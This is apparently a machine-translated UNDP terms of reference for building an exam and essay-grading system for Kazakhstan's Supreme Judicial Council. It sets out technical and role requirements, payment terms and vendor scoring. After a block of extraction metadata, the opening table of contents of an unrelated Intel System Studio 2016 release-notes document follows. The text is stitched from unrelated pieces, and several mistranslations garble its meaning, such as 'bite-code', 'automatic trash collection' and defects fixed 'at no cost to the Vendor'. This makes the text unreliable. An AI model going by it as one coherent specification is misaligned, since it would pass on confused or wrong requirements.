- Automatic generation of analytical reports necessary for decision-making in the performance of the main tasks of the Supreme Judicial Council of the Republic of Kazakhstan.
**General Requirements for the System**
The system shall ensure compliance with system-wide principles, which, in particular, include:
- Comprehensiveness, which shall be implemented by creating the System that is flexibly configurable to run various combinations of software and hardware tools of related information systems;
• Modularity, which shall be implemented by means of consecutive division of the System structure into elements: subsystems and workstations;
• Hierarchy, which shall be implemented through designing a multilevel organizational and functional structure of the System in accordance with its division into elements and in compliance with the delegation of authority to work with them to the appropriate employee in accordance with the assigned role functions;
• Purposefulness, which shall be implemented by shaping the System in accordance with the need to support specific business processes
When developing software and System documentation, state information technology standards shall be used. In the tables below, M means a mandatory requirement.
**Standardization & Unification Requirements**
The Vendor shall develop the System in accordance with the following international standards:
- Record Management ISO 15489
- ISO 26122 Workflow Analysis for Records
- ISO 18128 Risk assessment for accounting processes and systems
- ISO / IEC 16824: 1999 Information technology. 120mm DVD-Rewritable Disc (DVD-RAM)
- ISO / IEC 16448: 2002 Information technology. DVD-ROM
- ISO 12654: 1997 Recommendations on Electronic Imaging for Controlling Electronic Recording Systems for Recording Documents that may be required as Evidence to an Optical Disc WORM
- ISO/IEC TR 9294: 2005 Information technology. Recommendations for the software documentation management
- ISO/IEC 9075: 2003 Information Technologies. Database languages. SQL. Part 1, 2 and 11
**Requirements for technical and functional architecture of the System**
When developing the System, the following technical solutions shall be applied:
| M001 | The repository of meta-information about documents shall be implemented within a relational database. The open-source free object-relational database management system based on SQL language shall be used as this database. Database functions shall be executed on the server, not on the client. The database shall allow the use of functions that return a set of records, which can then be used in the same way as the result of an ordinary query. |
| M002 | In terms of User Interface (UI) implementation, a single-page application shall be developed in a multi-paradigm programming language, using any modern set of UI building libraries. The programming language used shall support object-oriented, imperative, and functional styles. Architecturally used programming language shall support dynamic typing, weak typing, automatic memory management, prototype programming. The programming language shall also support the following features:
- Objects with the ability to introspect;
- Features as first-class objects;
- Automatic type conversion;
- Automatic trash collection;
- Anonymous features |
| M003 | To implement the server components of the application it is necessary to use a monolithic architecture or multi-module monolithic architecture. |
| M004 | If the Vendor uses off-the-shelf solutions and libraries, all libraries and solutions offered for use shall come with open-source code (open-source solutions). The only exceptions may be software solutions for text recognition and text translation of media files. |
| M005 | The System shall be developed in an object-oriented language. The applications made in the language used shall be convertible into bite-code, which is executed by a virtual machine, a |
program that processes the byte-code and transmits instructions to the hardware as an interpreter.
Queries to data located in databases shall be performed using the SQL language (SQL queries). Exceptions are queries in the full-text search part.
**System Component Requirements**
| M007 | There shall be two main roles in the system: Administrator and Candidate. |
| M008 | The following features shall be available to the candidate: |
| | - Signing up as a candidate; |
| | - Writing an essay on a previously selected topic; |
| | - Case study problem solving; |
| | - Getting acquainted with the memo on writing an essay and on solving case problems (depending on the chosen field). |
| M009 | The following features will be available to the administrator: |
| | - Forming a list of candidates; |
| | - Monitoring and analysis of conducted exams; |
| | - Viewing and printing output forms. |
| M010 | The essay shall be typed in the System, using the built-in text editor, not more than 500 words and appropriate formatting. |
| M011 | The system shall generate and assign an individual code to each candidate |
| M012 | The system shall provide the ability to limit the allotted time to write an essay, with a feedback report. |
| M013 | The system shall make it possible to print works to be submitted to the competition committee without giving any names (only with an individual number). |
| M014 | The system shall provide the ability to evaluate the written work according to seven criteria: |
| | - Ability to identify and analyze problematic issues on a given topic; |
| | - Criticality and creativity of thinking; |
| | - Ability to reason and prove the point of view; |
| | - The validity of opinions; |
| | - Identification of practical and feasible ways to solve the problem; |
| | - Knowing strategic and program documents of the state, legal literacy and reference to the legislation; |
| | - Grammar and vocabulary. |
| M015 | The system shall provide the ability to grade written work on a five-point system. |
| M016 | The system shall enable report generation: the report shall contain the candidates’ names sorted alphabetically and associated code for the candidate. |
**UI Requirements**
In terms of appearance, the System shall provide a user interface that meets the following requirements:
| M017 | The System interface shall provide a similar design style for subsystems. |
| M018 | The system interface shall be developed in the state (Kazakh) and Russian languages. |
| M019 | The requirements to the user interface may be changed and/or supplemented according to the Client’s requirements and comments of the System users. |
**Requirements for user roles and responsibilities**
| M020 | The system shall provide a minimum set of roles and responsibilities for the specified roles described in Table 1. |
| M021 | Requirements for user roles and responsibilities may be changed and/or supplemented according to the Client’s requirements and the comments of the System users. |
**Table 1. Roles and responsibilities of the System users**
<table>
<thead>
<tr>
<th>Ref. No.</th>
<th>User Role</th>
<th>Role Description</th>
</tr>
</thead>
</table>
| 1 | Candidate | • Registration as a candidate;
| | | • Writing an essay on a previously selected topic;
| | | • Case study problem solving;
| | | • Reading the guide to writing essays and solving case studies (depending on the chosen area of study). |
| 2 | Administrator | • Formation of candidate list;
| | | • Monitoring and analysis of conducted exams;
| | | • Review and print output forms |
**Mandatory general composition and scope of work to implement the System**
M022 The Vendor shall arrange for organizational pre-project activities in order to build the Project Team, Develop, coordinate and approve the Calendar Plan within one month after the registration of the Contract with the Treasury Department.
M023 The Vendor shall conduct a pre-project survey of the automation facility to generate requirements for the System, including requirements for server hardware, storage/backup systems, communication channels and administration.
M024 The Vendor shall develop the System.
M025 The Vendor shall conduct functional testing, performance testing, comprehensive system testing and staff training.
M026 The Vendor shall, in conjunction with the Client, perform internal acceptance tests of the System. The Vendor shall provide source code and additional libraries necessary and sufficient to compile the entire System. The deliverable shall be:
- Report and Acceptance Act of the system into operation;
- Software package on 3 CDs.
M027 The Vendor shall perform activities to eliminate system malfunctions and rectify the comments and suggestions of the System users and the Client identified in the course of the System’s test operation.
M028 The Vendor shall provide warranty service for the System.
**Patent Clearance Requirements**
M029 Patent clearance for the methods and technologies used in the territory of the Republic of Kazakhstan.
M030 There are no overt or hidden fees for licenses for the software offered for use, and no fees for further support and updates for that software. The only exceptions may be software solutions for text recognition and text translation of media files.
M031 Transfer the exclusive proprietary rights for all deliverables of the System to the Client, with the possibility of further use of the deliverables by the Client for its own purposes.
M032 Transfer the source codes of all components and libraries necessary for the proper functioning of the system to the Client. Illegal modification and disclosure and (or) use of the source program codes, software products and software are prohibited.
M033 If the Vendor uses out-of-the-box solutions and libraries, all libraries and solutions offered for use shall come with open-source code (open-source solutions). The only exceptions may be software solutions for text recognition and text translation of media files.
**Warranty Service Requirements**
The Vendor undertakes to guarantee the quality of the results obtained in the course of the work. The deadline for the provision of the work quality warranty will be 12 months from the date of the System’s commissioning.
The Vendor shall be responsible for remedying defects, errors and vulnerabilities in the System and non-compliance with the technical specification identified during the warranty period. In the event of any defects or deficiencies during the warranty period, the Vendor shall remedy such defects or deficiencies at no cost to the Vendor. The deadline for remedying defects and shortcomings shall be set by agreement between the Client and the Vendor and shall not exceed one month, or the deadline shall not exceed the warranty period.
System Information Security Requirements
In order to ensure information security, the Vendor shall be guided and responsible for compliance and ensuring the System’s Information Security requirements in accordance with the information security regulatory and technical documentation of the information system Owner and legislation of the Republic of Kazakhstan in the field of information security within its competence under the signed public procurement agreement.
Signing and submission of the Confidentiality and Non-Disclosure Agreement in the form established by the Client, within 10 (ten) working days from the date of the public procurement contract.
The information security and privacy requirements to the server, network and software being developed shall comply with the requirements of the Client’s regulatory and technical documents in the area of information security.
In order to ensure information security, it is necessary to strictly comply with all regulatory and technical documentation of the Client.
The key security mechanisms of the system are:
– identification and authentication;
– access control;
– logging and auditing.
Training Requirements
The main goal of the training program is to train administrators to operate the System within their job responsibilities.
The Vendor shall train the System administrators at the Client’s premises (not more than 5 people).
The Vendor is responsible for preparing the necessary hard and soft materials (manuals and other training documents).
Deliverables and Payment Terms:
The payments shall be made in accordance with the schedule below. Timing of tasks and payments shall be made according to the following table:
<table>
<thead>
<tr>
<th>No.</th>
<th>Deliverables</th>
<th>Deadline</th>
<th>Terms of Payment</th>
<th>Approval and authorization</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>-Information system software development; -Deployment and configuration of the system on the Client’s infrastructure that meets the technical requirements; -Replication and training of employees; -Pilot operation in the pilot facilities of Supreme Judicial Council of the RK.</td>
<td>Within 3 months after signing the Contract</td>
<td>100% payment after all services will be provided</td>
<td>Project Manager</td>
</tr>
</tbody>
</table>
Result: Ready-to-use System
Payment Schedule:
The Contractor’s proposal shall be submitted with a lump sum payment as specified in “Deliverables and Payment Terms”. The price offer shall include all indirect and direct costs (VAT, if applicable, and other mandatory payments). The Contractor must specify if it pays the VAT or not.
This contract sets a fixed price based on the achieved result, regardless of the extension of its specified
The payment shall be made in full (100%) after satisfactory completion of each item under the Scope of work and authorization of the deliverables by the Project Manager upon submission of the Statement of Completed Work and the Invoice;
Institutional arrangements:
The Project Manager from the UNDP and the Agency of the Republic of Kazakhstan for Counteracting Corruption shall directly supervise the implementation of the entire process. The potential Vendor is accountable for the quality and timely execution of the assigned tasks.
Duration:
3 months after contract signing (approximately May-July 2022).
Location:
The work is performed at the location of the company/organization. Considering the TOR requirement on training of employees, the company should add travel costs for 1 person to its Financial proposal if its location isn’t in Nur-Sultan (preliminary duration of the trip is 5 working days).
Mandatory conditions:
Responsibility and coordination:
• The Contractor should fully accept and agree with the TOR requirements and the General Terms and Conditions for UNDP Contract
• The Contractor shall be responsible for the timely and rational planning, execution of activities and achievement of the expected deliverables in accordance with these Terms of Reference;
• The Contractor shall bear responsibility for the accuracy and legality of the materials and information provided;
• The Contractor shall not be entitled to distribute, transfer data, materials, reports collected/prepared under these terms of reference to third parties without permission of UNDP;
• When carrying out all types of work, the Contractor shall ensure full safety of materials and reports in soft and hard copy. All materials and reports shall be executed in a manner that ensures their safety;
• In the course of the work, the Contractor shall independently hold working meetings on the stages of the work as necessary;
• The work shall be performed in a quality and timely manner, in accordance with the Contract requirements and these Terms of Reference. In case of poor quality of the Contractor’s work (not in accordance with the terms of reference), UNDP reserves the right to submit proposals and comments for rectification within a certain period of time;
• UNDP reserves the right to make amendments in the Terms of Reference (up to 25% of the content), but will not allow changes in the overall essence of the Services and the cost of services under the Contract. The Contractor shall ensure the safe and lawful execution of the required deliverables (reports, finished products, except for the creation of counterfeit products) in all activities that may be required in the execution of this task;
• It is necessary to ensure compliance with the laws and regulations of the Republic of Kazakhstan on copyright (and related rights). It is also required to comply with the laws and regulations of the Republic of Kazakhstan in the execution of this task;
• In the course of work the Contractor is accountable to the UNDP Project Manager in charge of this work. All actions related to the implementation of this work shall be mandatorily agreed with the specified employees of the Project.
IMPORTANT!!! COVID-19. The Contractor is committed to providing all necessary protective equipment for its employees and to comply with all WHO standards and recommendations of local authorities to carry out work during the epidemic. The service provider is responsible for ensuring that its employees involved in this Terms of Reference are properly and promptly provided with all necessary personal protective
equipment in accordance with current WHO guidelines (masks, gloves, disinfectants, COVID-19 test (if necessary)) for the entire period of work on this assignment.
Qualification requirements for the service provider:
The prospective contractor must be a duly registered company/organization that meets the following requirements:
1. Have civil legal capacity to enter into contracts (certificate of registration/re-registration, constituent documents);
2. The organization shall be solvent, not subject to dissolution, its property shall not be seized, its financial and economic activities shall not be arrested in accordance with the legislation (balance sheets for 2020-2021; certificates, statements confirming no debts to the tax authorities and at servicing banks);
3. To have at least 3 years of experience in software development, maintenance, modification and technical support;
4. To provide a list of rendered services for the last 3 years in the field of software development, maintenance, modification and technical support;
5. To possess inventory, methodological, regulatory and software tools for execution of all works, stipulated by the current Terms of Reference;
6. Availability of qualified personnel with the necessary work experience and qualifications according to the table below:
<table>
<thead>
<tr>
<th></th>
<th>Team composition</th>
<th>Number of people</th>
<th>Educational level and field of study</th>
<th>Special skills / work experience</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Project Manager</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-Possess any one of the PMI/CPM/Prince2/IPMA certifications; -Experience of at least 2 years in project management.</td>
</tr>
<tr>
<td>2</td>
<td>Information technology management methodology Manager</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-COBIT certification, or equivalent; -Experience of at least 1 year in the field of information technology.</td>
</tr>
<tr>
<td>3</td>
<td>Lead analyst</td>
<td>1</td>
<td>Higher education in IT, economics, finance, management, engineering, or related field;</td>
<td>-Certification in business process modeling (OMG Certified UML Professional); -Certification in the field of business analysis (internationally recognized practice of business analysis combining classical approach to business analysis and flexible methodologies); -Experience of at least 3 years in data analytics, business intelligence or modeling.</td>
</tr>
<tr>
<td>4</td>
<td>System Architect</td>
<td>1</td>
<td>Higher education in IT, engineering, or related field;</td>
<td>-Certification in IT Architecture; -Certification in SQL programming language at least “Expert” level; -Certification in the use of cryptographic providers;</td>
</tr>
<tr>
<td>Position</td>
<td>Required Experience/Qualifications</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>----------------------------------</td>
<td>-----------------------------------------------------------------------------------------------------</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Software code developer</strong></td>
<td>Higher education in IT, engineering, or related field; Certification in Java SE; Experience of at least 1 year in Java development.</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Application Developer</strong></td>
<td>Higher education in IT, engineering, or related field; Certification in Kubernetes Application Developer; Certification in Elastic Certified Engineer; Experience of at least 3 years in application development.</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>System Administrator</strong></td>
<td>Higher education in IT, engineering, or related field; Certification in Linux-like operating systems administration (Linux version 7 or higher); Certification in application server administration; Certification in Enterprise DB PostgreSQL relational database administration; Certification in Kubernetes Administration; Experience of at least 3 years in System Administration.</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Administrator</strong></td>
<td>Higher education in IT, engineering, or related field; Experience of at least 3 years in the field of system administration.</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
**Recommendations for submitting an offer (documents to be provided):**
1) Duly completed, signed and sealed forms of UNDP format: Annex 2a; Annex 2b (Annex 2b must be password protected);
2) Company’s profile with detailed activity information describing the nature of the business, area of expertise:
✓ confirming at least 3 years of experience in software development, maintenance, modification and technical support;
3) Methodology and work schedule. Methodology should communicate what approach will be taken and how the task will be performed, as well as a detailed execution plan. Work Schedule shall include team composition and assignment of responsibilities, brief description of methods and procedures for performing the work
4) Certificate of state registration / re-registration;
5) Balance sheets for 2020-2021. Certificates confirming the absence of debts in the tax authorities and at servicing banks. Certificate of VAT, if applicable. If the company is not a VAT payer, written confirmation to be provided
6) A list of services rendered over the last 3 years in the field of software development, maintenance, modification, technical support with indication of the Customer, name of services / works, year of service provision and customer contact details (e-mail, phone number and full name of contact person);
7) Written confirmation of the facilities (Internet connection, computers, office equipment) necessary to perform this Terms of Reference;
8) Written confirmation that the proposal shall be valid for at least 90 days;
9) Detailed resume, diplomas and certificates of the proposed key personnel, as well as written confirmation from each employee that they will be available for the entire validity of the Contract;
10) All other documents proving qualifications and experience according to the requirements specified in the Vendor Requirements section.
**Best Offer Selection Criteria:**
Highest cumulative score (based on the following weighted allocation of scores: technical proposal (70%) and financial proposal (30%), where the minimum passing score of technical proposal is 70% (490 points).
**Step I: Preliminary evaluation** (Pass/fail). ONLY fully and timely submitted applications with all required documentation would be considered for preliminary evaluation. Applications will be evaluated meeting the TOR qualification requirements for the service provider.
**Step II: Technical Evaluation** = maximum 700 points, including:
- Company Professional Experience (20%);
- Proposed Methodology and Work Plan (20%);
- Expert Group Qualifications (60%)
Only Bidders obtained 490 points (70% from 700 points maximum) will be considered for financial evaluation.
**Step III: Financial Evaluation** = 300 points.
**Criteria for Technical Evaluation**
<table>
<thead>
<tr>
<th>#</th>
<th>Criteria</th>
<th>Weight %</th>
<th>Maximum Score</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Company’s expertise</td>
<td>20%</td>
<td>140</td>
</tr>
<tr>
<td>2</td>
<td>Proposed methodology and Work Plan</td>
<td>20%</td>
<td>140</td>
</tr>
<tr>
<td>3</td>
<td>Expert Group Qualifications</td>
<td>60%</td>
<td>420</td>
</tr>
<tr>
<td></td>
<td>Total</td>
<td>100%</td>
<td>700</td>
</tr>
</tbody>
</table>
1. **Company’s Professional Experience**
1.1 Company’s profile with detailed activity information describing the nature of the business, area of expertise:
- ✓ confirming experience in Software Development, Maintenance and Technical Support:
- 3 years of experience – 70 points;
- 4-5 years of experience - 85 points;
- 6 years and more - 100 points.
1.2 Availability of material, technical and software to perform all work stipulated by this Terms of Reference:
- Hardware and Software is available- 40 points.
**Total Section 1**
140
## 2. Proposed Methodology and Work Plan
### 2.1 Work Methodology
Whether the proposed methodology comply with the item “Methodological support” of this Terms of Reference, in particular the development of the system:
- Work methodology is available – 35 points;
- The proposed work methodology clearly shows an algorithm for achieving results, detailing and justifying the approaches to performing the work, taking into account the specifics of the task - 50 points.
### 2.2 Methodology Includes All Activities Specified in the TOR, Such as the Development of Information System Software, Building the Necessary Infrastructure, etc.
- Methodology includes some of all aspects - 35 points;
- Methodology includes all aspects - 50 points
### 2.3 Work Schedule (shall include the composition of the team and the distribution of responsibilities):
- Work Schedule is available – 28 points;
- The outlined Work Schedule has a logical framework for achieving deliverables, including the distribution of responsibilities of the expert group members - 40 points.
### Total Section 2
140 points
## 3. Key Personnel Qualifications
### 3.1 Project Manager (1 person)
#### 3.1.1 Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:
- Bachelor degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points.
#### 3.1.2 Holds any of the PMI/CPM/Prince2/IPMA Certifications.:
- No certificate - 0 points;
- Any of the above Certificates is available - 20 points
#### 3.1.3 Experience in Project Management:
- 2 years - 14 points;
- Each additional year - plus 2 points
- Maximum - 20 points
### Total Section 3.1
55 points
### 3.2 Information Technology Management Methodology Manager (1 person)
#### 3.2.1 Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points.
<table>
<thead>
<tr>
<th>Subsection</th>
<th>Description</th>
<th>Points</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.2.2</td>
<td>COBIT Certification or Equivalent:</td>
<td>10</td>
</tr>
<tr>
<td>• No Certification – 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• COBIT Certification or equivalent - 10 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.2.3</td>
<td>At least 1 year of experience in Information Technology:</td>
<td>20</td>
</tr>
<tr>
<td>• 1 year – 14 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Each additional year - plus 2 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Maximum - 20 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Total Section 3.2</strong></td>
<td></td>
<td><strong>45</strong></td>
</tr>
<tr>
<td>3.3</td>
<td>Lead Analyst (1 person):</td>
<td></td>
</tr>
<tr>
<td>3.3.1</td>
<td>Higher Education in IT, Economics, Finance, Management, Engineering or Related Fields:</td>
<td>15</td>
</tr>
<tr>
<td>• Bachelor Degree – 10.5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Master’s Degree - 13 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• PhD and/or Graduate School - 15 points.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.2</td>
<td>Business Process Modeling Certification (OMG Certified UML Professional):</td>
<td>15</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 15 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.3</td>
<td>Business Analysis Certification (internationally recognized business analysis practice combining classical approach to business analysis and flexible methodologies):</td>
<td>15</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 15 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.3.4</td>
<td>Experience in Data Analytics, Business Intelligence or Modeling:</td>
<td>20</td>
</tr>
<tr>
<td>• 3 years – 14 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Each additional year - plus 2 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Maximum - 20 points</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>Total Section 3.3</strong></td>
<td></td>
<td><strong>65</strong></td>
</tr>
<tr>
<td>3.4</td>
<td>System Architect (1 person):</td>
<td></td>
</tr>
<tr>
<td>3.4.1</td>
<td>Higher Education in IT, Engineering, or Related Fields:</td>
<td>15</td>
</tr>
<tr>
<td>• Bachelor Degree – 10.5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Master’s Degree - 13 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• PhD and/or Graduate School - 15 points.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.2</td>
<td>IT Architecture Certification:</td>
<td>10</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 10 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.3</td>
<td>Certification in SQL Programming Language at least “Expert” Level:</td>
<td>5</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>3.4.4</td>
<td>Certification in the use of cryptographic providers:</td>
<td>5</td>
</tr>
<tr>
<td>• No Certification - 0 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>• Certification is available - 5 points;</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Section</td>
<td>Description</td>
<td></td>
</tr>
<tr>
<td>---------</td>
<td>-------------</td>
<td></td>
</tr>
</tbody>
</table>
| 3.4.5. | Experience in IT architecture:
- 3 years – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.4** | **55** |
| 3.5 | **Software Code Developer (1 person):** |
| 3.5.1 | Higher Education in IT, Engineering, or related fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points. | 15 |
| 3.5.2 | Java SE Certification:
- No Certification - 0 points;
- Certification is available - 20 points. | 20 |
| 3.5.3 | Experience in Java Development:
- 1 year – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.5** | **55** |
| 3.6 | **Application Developer (1 person):** |
| 3.6.1 | Higher education in IT, Engineering, or related fields:
- Bachelor Degree – 10.5 points;
- Master’s Degree - 13 points;
- PhD and/or Graduate School - 15 points. | 15 |
| 3.6.2 | Kubernetes Application Developer Certification:
- No certification - 0 points;
- Certification is available - 10 points. | 10 |
| 3.6.3 | Elastic Certified Engineer Certification:
- No Certification - 0 points;
- Certification is available - 10 points. | 10 |
| 3.6.4 | Experience in Application Development:
- 3 years – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.6** | **55** |
| 3.7 | **System Administrator (1 person):** |
| 3.7.1 | Higher education in IT, Engineering, or Related Fields:
- Bachelor degree- 10.5 points;
- Master’s degree - 13 points;
- PhD and/or graduate school - 15 points. | 15 |
| 3.7.2 | Certification in Linux-like Operating Systems Administration (Linux 7 version or higher):
- No certification - 0 points;
- Certification is available - 5 points. | 5 |
| 3.7.3 | Certification in Application Server Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.4 | Certification in Enterprise DB PostgreSQL Relational Database Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.5 | Certification in Kubernetes Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.6 | Experience in System Administration:
• 3 years - 14 points;
• Each additional year - plus 2 points
• Maximum - 20 points | 20 |
| | Total Section 3.7 | 55 |
| 3.8 | Administrator (1 person):
3.8.1 | Higher Education in IT, Engineering, or Related Fields:
• Bachelor degree – 10.5 points;
• Master’s Degree - 13 points;
• PhD and/or Graduate School - 15 points. | 15 |
| 3.8.2 | Experience in system administration:
• 3 years – 14 points;
• Each additional year - plus 2 points
• Maximum - 20 points | 20 |
| | Total Section 3.8 | 35 |
| | Total Section 3 | 420 |
| | Total technical score | 700 |
| Financial (Lower Offer/Offer*30) | 30% |
| Total Score | Technical score 70% + 30% Financial |
|
{"Source-Url": "https://procurement-notices.undp.org/view_file.cfm?doc_id=290283", "len_cl100k_base": 8713, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 33953, "total-output-tokens": 9091, "length": "2e13", "weborganizer": {"__label__adult": 0.0016021728515625, "__label__art_design": 0.0016803741455078125, "__label__crime_law": 0.0229034423828125, "__label__education_jobs": 0.272705078125, "__label__entertainment": 0.0003800392150878906, "__label__fashion_beauty": 0.0009369850158691406, "__label__finance_business": 0.075439453125, "__label__food_dining": 0.0012979507446289062, "__label__games": 0.003162384033203125, "__label__hardware": 0.002796173095703125, "__label__health": 0.0013446807861328125, "__label__history": 0.0009713172912597656, "__label__home_hobbies": 0.0006861686706542969, "__label__industrial": 0.003475189208984375, "__label__literature": 0.0011730194091796875, "__label__politics": 0.00383758544921875, "__label__religion": 0.001194000244140625, "__label__science_tech": 0.007781982421875, "__label__social_life": 0.0005040168762207031, "__label__software": 0.0189056396484375, "__label__software_dev": 0.5732421875, "__label__sports_fitness": 0.0011157989501953125, "__label__transportation": 0.00213623046875, "__label__travel": 0.0008063316345214844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37957, 0.03747]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37957, 0.02136]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37957, 0.88102]], "google_gemma-3-12b-it_contains_pii": [[0, 2757, false], [2757, 5888, null], [5888, 9582, null], [9582, 12727, null], [12727, 16024, null], [16024, 19267, null], [19267, 22878, null], [22878, 25684, null], [25684, 28514, null], [28514, 30768, null], [30768, 32741, null], [32741, 34841, null], [34841, 36780, null], [36780, 37957, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2757, true], [2757, 5888, null], [5888, 9582, null], [9582, 12727, null], [12727, 16024, null], [16024, 19267, null], [19267, 22878, null], [22878, 25684, null], [25684, 28514, null], [28514, 30768, null], [30768, 32741, null], [32741, 34841, null], [34841, 36780, null], [36780, 37957, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37957, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37957, null]], "pdf_page_numbers": [[0, 2757, 1], [2757, 5888, 2], [5888, 9582, 3], [9582, 12727, 4], [12727, 16024, 5], [16024, 19267, 6], [19267, 22878, 7], [22878, 25684, 8], [25684, 28514, 9], [28514, 30768, 10], [30768, 32741, 11], [32741, 34841, 12], [34841, 36780, 13], [36780, 37957, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37957, 0.28212]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
ef65474d0630fc8d1224189f297cb8106fbaaffc
|
# Intel® System Studio 2016 Update 2
## Installation Guide and Release Notes
Installation Guide and Release Notes for Linux* Host
5 February 2016
## Contents
1. **Introduction**................................. 5
2. **What's New**................................. 6
2.1 **Versions History**.......................... 9
3. **Intel® Software Manager**.................. 9
4. **Product Contents**........................... 10
5. **Getting Started**............................. 10
6. **Technical Support and Documentation**.... 11
6.1 **Release / Installation Notes and User Guides Location** 11
6.2 **Article & Whitepaper Locations**........... 13
6.3 **Support**.................................. 13
6.4 **Support for native code generation for Intel® Graphics Technology** 13
7. **System Requirements**...................... 15
7.1 **Supported Host Platforms**............... 15
7.2 **Eclipse® Integration Prerequisites**........ 16
7.3 **Host Prerequisites and Resource Requirements** 16
7.3.1 **Host Space Requirements by Component** 16
7.3.2 **Intel® Integrated Performance Primitives (Intel® IPP) Details** 16
7.3.3 **Intel® C++ Compiler**.................. 17
7.4 **Target Software Requirements**.......... 17
7.5 **Target Prerequisites and Resource Requirements** 17
7.5.1 **Target Space Requirement by Component** 17
7.5.2 **Intel® VTune™ Amplifier target OS kernel configuration** 18
7.5.3 **Intel® VTune™ Amplifier Feature vs. Resource Matrix** 19
# Intel® System Studio 2016 Update 2 – Installation Guide and Release Notes
## 7.6 Hardware Requirements
## 7.7 Intel® Graphics Technology development specific requirements
## 8 Installation Notes
8.1 Installing the Tool Suite
8.2 Product Installation (Online Installer)
8.3 Product Installation (Full Package Offline Installer)
8.4 Activating the Product
8.5 Default / Customized Installation
8.6 Uninstalling the Tool Suite
8.7 Installation directory structure
8.8 Development target package installation
8.8.1 Intel® Inspector Command line interface installation
8.8.2 Preparing a Target Android* System for Remote Analysis
8.8.3 Intel® VTune™ Amplifier Collectors Installation on Remote Linux* Systems
8.8.4 Intel® VTune™ Amplifier Sampling Enabling Product Installation on Remote Linux* Systems
8.8.5 Intel® Integrated Performance Primitives redistributable shared object installation
8.8.6 Intel® Math Kernel Library redistributable shared object installation
8.8.7 Intel® C++ Compiler dynamic runtime library installation
